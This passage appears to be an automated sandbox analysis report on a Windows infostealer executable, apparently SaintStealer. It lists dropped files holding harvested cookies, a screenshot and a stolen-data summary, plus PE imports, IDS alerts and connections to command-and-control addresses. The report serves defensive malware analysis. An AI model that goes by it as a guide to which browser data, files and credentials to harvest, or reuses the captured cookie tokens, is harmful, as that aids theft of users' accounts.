                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqrhqe3i.ift.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_px143xon.2ay.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\out.zip

                            Download File
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                            Category:dropped
                            Size (bytes):937774
                            Entropy (8bit):7.568306209647945
                            Encrypted:false
                            SSDEEP:12288:NcDv9SSkL9v3Lbzns8Fdcs/VlR7PVWeHMYU0ioMvEAWw0/Pbfk0QfN9ad47QCKel:qDTkRf3znfhVlRuYUyNYhWKeNk
                            MD5:AF4A7615188ACFBC537C50BAD7D55DE7
                            SHA1:741213728277562A9F621D6E8E8121280B875B1A
                            SHA-256:7E4AE1F528BE4BBCA0775BF223EC4AA7BDCDCDB4C7091FCA2E667FE8EE9C11DC
                            SHA-512:49F40316630FF49B8260EB49B189C364A54CFC251D1800412D790DE90D3DBCBBCBDB30C87DF9AE3F621EA28C1759DC878F9501818EF74E8B7BDE873D410075C4
                            Malicious:false
                            Preview:PK........d7.X................Autofill/PK........d7.X................Cookies/PK........d7.X................CreditCards/PK........d7.X................Downloads/PK........d7.X................History/PK........d7.X................Passwords/PK........d7.X...(............screen1.png.PNG........IHDR................C...IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.

                            C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Cookies\Chrome_Default_Network.txt

                            Download File
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):286
                            Entropy (8bit):5.767232012810563
                            Encrypted:false
                            SSDEEP:6:PkU6W3rzxbiEvcKGWlmIrBNuYraqWTfqgqlB1Hwsv7OjPn:cU9bzkEv7BdBNuMWfqnym7O7n
                            MD5:01074DEC455BFC7D979EEA418871413C
                            SHA1:8C2AA1FA48839290016BADCF927FD46EEEBC909A
                            SHA-256:A39398718E40F7B5639D3EC5335EFDF07A8DAC7036DC09A085A81F5C35185CE4
                            SHA-512:110C784EE4F1D57A4C8151F1AD838A1CC2E5BF87C5FE5F9EE81F0E5CC9642480BDB087375AB3F7A069215A076C229A573E70B8807EEA3527093C5C1CEE16774D
                            Malicious:false
                            Preview:.google.com.false./.true.13343559538131870.1P_JAR.2023-10-05-08...google.com.true./.true.13356778738131921.NID.511=orcSInoZBb6Srw0PdPMNeLGKsegfLi-tQnviho5hKJXKDNg0kXIPnfTcuwV5r7RqjT893pWGJF7klKqldBoj4rDJvxfFlgDOCcW9aKDnU9zIlUh2LP0vO8k3uT0gHJD1JvVAclkJnKwZG6hDAl62HrMxNrUeqSR-WF1J-l9YYgE

                            C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\screen1.png

                            Download File
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):910827
                            Entropy (8bit):7.55066923841877
                            Encrypted:false
                            SSDEEP:12288:8cDv9SSkL9v3Lbzns8Fdcs/VlR7PVWeHMYU0ioMvEAWw0/Pbfk0QfN9ad47QCKeM:RDTkRf3znfhVlRuYUyNYhWKM
                            MD5:E592E95E08E5828C7AC352D875815807
                            SHA1:9F55568BEB35EF78FEA091D36D718C30774362C6
                            SHA-256:A60CA122CCB81A5431E422A5134A86F52A8501A958D2C5344FAF120EA3B87B38
                            SHA-512:AF982BC10A5E81A986ABFF87F2686709D674BE53A796F03290DBBAA3DD7E8CB1C01327683182083FCF44A564B584CB16746A16CF3645AF7A4F031C7C414F6D78
                            Malicious:false
                            Preview:.PNG........IHDR................C...IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6...".....I)..H""..L.$a..I.d&...$.R..m$!..d&..$$.....~...@)..`.&."...d..T..Ak.Z+.V.i...m.i"3). .....q..@...Mf..H"".L2..D...U2..D...m.q$....&.If.../"..$.2...6..$.(".Df..H....8.d&..@f.PJ.6..`...O..Af.0M.}.Ske.^s?..D....@D....IHB..If...R....ls?.R.Dk........d&...... "h.1...m2..IB..

                            C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\sensitive-files.zip

                            Download File
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):22474
                            Entropy (8bit):7.843771809251028
                            Encrypted:false
                            SSDEEP:384:bCZrZimrJZyQ9t3RXsCZrZimrJZyQ9t3RX7C51:bCtRJZyQX3WCtRJZyQX3Q1
                            MD5:60FD18EDC84ACE5821FAD5E9F6770C44
                            SHA1:0F6385A5DF924BA554E7C21F8FE1B49EBB001219
                            SHA-256:1A6F06DDDEB20EE49F61A50B5C447E06C4CA7CCD19DAD16722923986418E4D8E
                            SHA-512:8390AE4ACCEA9C90532ABF8027E61AD66AB6FD329F306FBC776E6125FF9472ABD7CCC48A5B216C073F1FEC91B6B0408130CC61E34504FB1BFC600A5007C0994C
                            Malicious:false
                            Preview:PK........a7.X..+.............BNAGMGSPLO.jpg..I.E!......gEP..p..|7....,../^*r.._[....B.....wr.9n~$|.*.r.\.[&....J..$c..u..@..e.(g..N[..Sko..:...B..T...cz.>:a'.....y..MXW.y...N...(%$.W.....U.x.0.........Yf.[.-..@j.A;.a$a51Gw.].0.n.....q.a..L(X!..wF....E..........l.Ci.!...V....eZ..In..%.%..."}E...+cu.s#.V..qPsa..EDy|.......*..p.]..l&.TR..:|....v..>[...TV.j..|.M...e0....;Y..%.w...d.T.{.U.&...vU.q)S.HdG.....6...R....VE...&P.N....e ....bq_j*.#d..}..l.yF........4E.N..Y.O.6D....|.....v..6j.1>.O...X..W.9x.z....EO.#...i.*_T.Kq....t.../9J........F..u..v..`..v..H.w.|v.4N....^...A.zY4....;7..k|....a...N.....k.W..CeMgQ.~..f....8z...h...'.....n.....q.!.)....PK........a7.X..d)............GAOBCVIQIJ.pdf..I.E!.E...GE.^......r.....B.ha.6...j5....CgC.k.....w#.-U...;....4.KB..dL.......zQo....m...oV2..~...Lm....`}@4..PQ<...L"-...d...j}}....u'............Cn...3h.....g*....V.+..i..o..=...E.d.:......)$..>Kb....x.:)....,.....#..{$.Bni...:Gc.....U...Z..r+...u

                            C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\user_info.txt

                            Download File
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:Unicode text, UTF-8 text, with CRLF, CR, LF line terminators
                            Category:dropped
                            Size (bytes):705
                            Entropy (8bit):5.3318380531157485
                            Encrypted:false
                            SSDEEP:12:eM3lAQN3oi23w/7QQ84xx6YzGyrJF9qiOlQM7NlVQBQM3aWflIHdAMij01+XaBL2:eaNYv3w/7QWxxVC4mOM7NlVQe8lOAMiR
                            MD5:E7DAE70FF589432E5FA82981B487CCDF
                            SHA1:2A27865A50CEEF94ED2D8FBF768B013FA8D30E03
                            SHA-256:482F7BA9443DA517388946E12AD4324CCB93F9B38AB133500838B251CB181D97
                            SHA-512:61A932AEA48C554C53E5340F366A5EA1B52BFB0F27771E951DF5DF5CF63D2E480F5E72B2CA63A150862B953E57F24C90BE8AEE3D2BC5E0BCACD03CB9C94D1A7B
                            Malicious:false
                            Preview:..- IP Info -....IP: 8.46.123.33..Country: United States..City: New York..Postal: 10000..ISP: Level - A3356..Timezone: -04:00....- PC Info -....Username: user..OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: Y7SLS (1280, 1024)..HWID: 5205123305035030..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\765iYbgWn9.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -.....Build:_____....Passwords: ....Cookies: . 2...Wallets: ....Files: . 30...Credit Cards: ....Servers FTP/SSH: ....Discord Tokens: .......Tagged URLs: ....Tagged Cookies: .......Tags Passwords: .....Tags Cookies:

                            C:\Users\user\AppData\Local\Temp\sensitive-files.zip

                            Download File
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):22474
                            Entropy (8bit):7.843771809251028
                            Encrypted:false
                            SSDEEP:384:bCZrZimrJZyQ9t3RXsCZrZimrJZyQ9t3RX7C51:bCtRJZyQX3WCtRJZyQX3Q1
                            MD5:60FD18EDC84ACE5821FAD5E9F6770C44
                            SHA1:0F6385A5DF924BA554E7C21F8FE1B49EBB001219
                            SHA-256:1A6F06DDDEB20EE49F61A50B5C447E06C4CA7CCD19DAD16722923986418E4D8E
                            SHA-512:8390AE4ACCEA9C90532ABF8027E61AD66AB6FD329F306FBC776E6125FF9472ABD7CCC48A5B216C073F1FEC91B6B0408130CC61E34504FB1BFC600A5007C0994C
                            Malicious:false
                            Preview:PK........a7.X..+.............BNAGMGSPLO.jpg..I.E!......gEP..p..|7....,../^*r.._[....B.....wr.9n~$|.*.r.\.[&....J..$c..u..@..e.(g..N[..Sko..:...B..T...cz.>:a'.....y..MXW.y...N...(%$.W.....U.x.0.........Yf.[.-..@j.A;.a$a51Gw.].0.n.....q.a..L(X!..wF....E..........l.Ci.!...V....eZ..In..%.%..."}E...+cu.s#.V..qPsa..EDy|.......*..p.]..l&.TR..:|....v..>[...TV.j..|.M...e0....;Y..%.w...d.T.{.U.&...vU.q)S.HdG.....6...R....VE...&P.N....e ....bq_j*.#d..}..l.yF........4E.N..Y.O.6D....|.....v..6j.1>.O...X..W.9x.z....EO.#...i.*_T.Kq....t.../9J........F..u..v..`..v..H.w.|v.4N....^...A.zY4....;7..k|....a...N.....k.W..CeMgQ.~..f....8z...h...'.....n.....q.!.)....PK........a7.X..d)............GAOBCVIQIJ.pdf..I.E!.E...GE.^......r.....B.ha.6...j5....CgC.k.....w#.-U...;....4.KB..dL.......zQo....m...oV2..~...Lm....`}@4..PQ<...L"-...d...j}}....u'............Cn...3h.....g*....V.+..i..o..=...E.d.:......)$..>Kb....x.:)....,.....#..{$.Bni...:Gc.....U...Z..r+...u

                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm

                            Download File
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):32768
                            Entropy (8bit):0.017262956703125623
                            Encrypted:false
                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                            Malicious:false
                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                            Entropy (8bit):6.398426891987362
                            TrID:
                            • Win64 Executable GUI (202006/5) 92.65%
                            • Win64 Executable (generic) (12005/4) 5.51%
                            • Generic Win/DOS Executable (2004/3) 0.92%
                            • DOS Executable Generic (2002/1) 0.92%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:765iYbgWn9.exe
                            File size:5'438'976 bytes
                            MD5:0534ab10184891cd61d262bfd79b7b4c
                            SHA1:a13d37959a92bc37f4d3c42eb53d77cc760f448a
                            SHA256:191272e200345dcb0a7a8c8c975a8b07847f07b9d9f0c3af472fdb88092aee0b
                            SHA512:381af090cc87f2f2b8583c28a164f8f2e978c2bdffe3161d37fa30e38c5e026b90ae5f45dd13f9ded8ee207e4694abf2a58256deb8986ec11d802b7578f6be9d
                            SSDEEP:49152:flhBWdxUM546QwStp9BLoQDbN46Nhz8kGAy9x2XdMP3Z+dlihVnp3qd38gT+c1m0:flXWhqntN46uPM3jwHYlDx7ILqTn
                            TLSH:69467B03FA9545EDC0AAC174875A9333EB32B84A0A24B79B5BD44A313F57F606F9C358
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z..R.f.R.f.R.f.[c..@.f...e.[.f...b._.f...c.z.f..ng.D.f..cg.P.f.R.g.w.f.F.b.H.f.R.f.X.f.F.d.S.f.RichR.f.................PE..d..

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0x1403930f0
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x140000000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66A3CC60 [Fri Jul 26 16:18:40 2024 UTC]
                            TLS Callbacks:0x4021ee90, 0x1
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:94e6725f9edd6f43dcf6269a222aa3c5

                            Entrypoint Preview

                            Instruction
                            dec eax
                            sub esp, 28h
                            call 00007F1334842D5Ch
                            dec eax
                            add esp, 28h
                            jmp 00007F1334842597h
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            nop word ptr [eax+eax+00000000h]
                            dec eax
                            sub esp, 10h
                            dec esp
                            mov dword ptr [esp], edx
                            dec esp
                            mov dword ptr [esp+08h], ebx
                            dec ebp
                            xor ebx, ebx
                            dec esp
                            lea edx, dword ptr [esp+18h]
                            dec esp
                            sub edx, eax
                            dec ebp
                            cmovb edx, ebx
                            dec esp
                            mov ebx, dword ptr [00000010h]
                            dec ebp
                            cmp edx, ebx
                            jnc 00007F1334842738h
                            inc cx
                            and edx, 8D4DF000h
                            wait
                            add al, dh

                            Rich Headers

                            Programming Language:
                            • [IMP] VS2008 SP1 build 30729

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x50bfd40x1cc.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5170000x148e0.pdata
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x52c0000x80a4.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x4ff2100x54.rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x4ff4000x28.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4ff0d00x140.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x3a60000x980.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x3a48e00x3a4a00418d52d22d0626c93475b7ef2f69473funknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x3a60000x1681680x1682007d024da4e364f95e765edb693d0e0470False0.3832728165133634data5.570926269189883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x50f0000x70b00x6200254e2bcebbf320ff6f1ad171ec302c16False0.4083227040816326data4.251782437606779IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .pdata0x5170000x148e00x14a00e0382aea4f0e950de6c4ac2410d86fe3False0.48731060606060606data6.250942251591513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x52c0000x80a40x8200d18ff0828687cfa57d6e95da4cab3c38False0.26580528846153845data5.455481822699318IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Imports

                            DLLImport
                            api-ms-win-core-synch-l1-2-0.dllWaitOnAddress, WakeByAddressAll, WakeByAddressSingle
                            bcryptprimitives.dllProcessPrng
                            ntdll.dllNtDeviceIoControlFile, NtCreateFile, NtWriteFile, RtlNtStatusToDosError, NtCancelIoFileEx, RtlUnwindEx, RtlPcToFileHeader, NtReadFile, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind
                            kernel32.dllMultiByteToWideChar, WriteConsoleW, GetModuleHandleA, GetProcAddress, CreateWaitableTimerExW, SetWaitableTimer, Sleep, QueryPerformanceFrequency, GetModuleHandleW, FormatMessageW, lstrlenW, GetEnvironmentVariableW, GetTempPathW, GetFileInformationByHandleEx, GetFullPathNameW, FlushFileBuffers, SetFilePointerEx, QueryPerformanceCounter, CreateDirectoryW, FindFirstFileW, FindClose, GetConsoleMode, SetFileCompletionNotificationModes, CreateIoCompletionPort, GetQueuedCompletionStatusEx, SetHandleInformation, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, GetCurrentProcess, DuplicateHandle, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, GetCurrentProcessId, CreateNamedPipeW, CreateThread, ReadFileEx, SleepEx, WriteFileEx, WaitForMultipleObjects, GetOverlappedResult, CreateEventW, CancelIo, ReadFile, ExitProcess, HeapAlloc, GetStdHandle, GetCurrentDirectoryW, WaitForSingleObjectEx, AddVectoredExceptionHandler, CreateMutexA, ReleaseMutex, WideCharToMultiByte, DeleteFileW, CopyFileExW, PostQueuedCompletionStatus, GetFinalPathNameByHandleW, SetLastError, GetSystemInfo, UnhandledExceptionFilter, SwitchToThread, SetFileInformationByHandle, GetModuleFileNameW, CreateFileW, SetUnhandledExceptionFilter, HeapReAlloc, GetExitCodeProcess, WaitForSingleObject, GetSystemTimePreciseAsFileTime, GetTickCount, MapViewOfFile, CreateFileMappingW, FormatMessageA, GetSystemTime, GetSystemTimeAsFileTime, FreeLibrary, SystemTimeToFileTime, GetFileSize, LockFileEx, LocalFree, UnlockFile, HeapDestroy, HeapCompact, LoadLibraryW, DeleteFileA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesExW, GetFileAttributesA, GetDiskFreeSpaceA, GetTempPathA, HeapSize, HeapValidate, UnmapViewOfFile, CreateMutexW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, HeapCreate, AreFileApisANSI, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, TerminateProcess, IsProcessorFeaturePresent, GetLastError, InitializeSListHead, GetCurrentThread, CloseHandle, IsDebuggerPresent, GetFileInformationByHandle, HeapFree, GetProcessHeap, EncodePointer, RaiseException, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryA, SetThreadStackGuarantee, FindNextFileW, LoadLibraryExW
                            ws2_32.dllWSAIoctl, ioctlsocket, socket, getsockname, WSAGetLastError, WSASend, shutdown, getpeername, send, WSACleanup, getsockopt, WSASocketW, closesocket, select, bind, listen, accept, setsockopt, freeaddrinfo, getaddrinfo, recv, connect, WSAStartup
                            rstrtmgr.dllRmRegisterResources, RmGetList, RmStartSession
                            user32.dllEnumDisplaySettingsExW, EnumDisplayMonitors, GetMonitorInfoW
                            bcrypt.dllBCryptGenRandom
                            advapi32.dllRegQueryValueExW, CheckTokenMembership, RegOpenKeyExW, AllocateAndInitializeSid, RegCloseKey, SystemFunction036, FreeSid
                            secur32.dllFreeCredentialsHandle, DeleteSecurityContext, AcquireCredentialsHandleA, ApplyControlToken, EncryptMessage, DecryptMessage, QueryContextAttributesW, InitializeSecurityContextW, AcceptSecurityContext, FreeContextBuffer
                            crypt32.dllCertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertEnumCertificatesInStore, CertAddCertificateContextToStore, CertFreeCertificateChain, CertGetCertificateChain, CertDuplicateStore, CertOpenStore, CertDuplicateCertificateContext, CertDuplicateCertificateChain, CertCloseStore, CryptUnprotectData
                            oleaut32.dllSysAllocStringLen, SafeArrayDestroy, VariantClear, SafeArrayAccessData, SysFreeString, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayUnaccessData
                            ole32.dllCoSetProxyBlanket, CoInitializeSecurity, CoInitializeEx, CoCreateInstance
                            gdi32.dllGetDeviceCaps, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, DeleteDC, GetDIBits, GetObjectW, DeleteObject, CreateDCW, StretchBlt
                            api-ms-win-crt-math-l1-1-0.dlllog, ceil, exp2f, _dclass, pow, truncf, __setusermatherr, roundf
                            api-ms-win-crt-string-l1-1-0.dllstrcspn, strlen, strcmp, strcpy_s, wcsncmp, strncmp
                            api-ms-win-crt-heap-l1-1-0.dllfree, _msize, realloc, calloc, malloc, _set_new_mode
                            api-ms-win-crt-utility-l1-1-0.dll_rotl64, qsort
                            api-ms-win-crt-time-l1-1-0.dll_localtime64_s
                            api-ms-win-crt-runtime-l1-1-0.dll_configure_narrow_argv, _seh_filter_exe, _endthreadex, _get_initial_narrow_environment, _initterm, _initialize_onexit_table, _beginthreadex, _initterm_e, exit, _exit, terminate, abort, __p___argc, __p___argv, _cexit, _c_exit, _register_onexit_function, _register_thread_local_exe_atexit_callback, _crt_atexit, _initialize_narrow_environment, _set_app_type
                            api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
                            api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                            2024-07-29T07:38:58.167052+0200TCP2039009ET MALWARE Win32/SaintStealer CnC Response44360284149.154.167.220192.168.2.8
                            2024-07-29T07:38:17.826882+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970613.85.23.86192.168.2.8
                            2024-07-29T07:38:45.004637+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4436028313.85.23.86192.168.2.8

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 29, 2024 07:38:00.864394903 CEST4970580192.168.2.8195.201.57.90
                            Jul 29, 2024 07:38:00.869271040 CEST8049705195.201.57.90192.168.2.8
                            Jul 29, 2024 07:38:00.869348049 CEST4970580192.168.2.8195.201.57.90
                            Jul 29, 2024 07:38:00.870285988 CEST4970580192.168.2.8195.201.57.90
                            Jul 29, 2024 07:38:00.875129938 CEST8049705195.201.57.90192.168.2.8
                            Jul 29, 2024 07:38:01.523041964 CEST8049705195.201.57.90192.168.2.8
                            Jul 29, 2024 07:38:01.523504972 CEST4970580192.168.2.8195.201.57.90
                            Jul 29, 2024 07:38:01.529794931 CEST8049705195.201.57.90192.168.2.8
                            Jul 29, 2024 07:38:01.529903889 CEST4970580192.168.2.8195.201.57.90
                            Jul 29, 2024 07:38:36.651216984 CEST4970880192.168.2.8195.201.57.90
                            Jul 29, 2024 07:38:36.658169985 CEST8049708195.201.57.90192.168.2.8
                            Jul 29, 2024 07:38:36.658260107 CEST4970880192.168.2.8195.201.57.90
                            Jul 29, 2024 07:38:36.658557892 CEST4970880192.168.2.8195.201.57.90
                            Jul 29, 2024 07:38:36.663522959 CEST8049708195.201.57.90192.168.2.8
                            Jul 29, 2024 07:38:37.310988903 CEST8049708195.201.57.90192.168.2.8
                            Jul 29, 2024 07:38:37.313565016 CEST4970880192.168.2.8195.201.57.90
                            Jul 29, 2024 07:38:37.318941116 CEST8049708195.201.57.90192.168.2.8
                            Jul 29, 2024 07:38:37.319013119 CEST4970880192.168.2.8195.201.57.90
                            Jul 29, 2024 07:38:56.109680891 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.109728098 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.109816074 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.129791975 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.129829884 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.778392076 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.778650045 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.780936956 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.780950069 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.781320095 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.821330070 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886003971 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886082888 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.886197090 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886235952 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.886321068 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886364937 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.886389971 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.886405945 CEST60284443192.168.2.8149.154.167.220
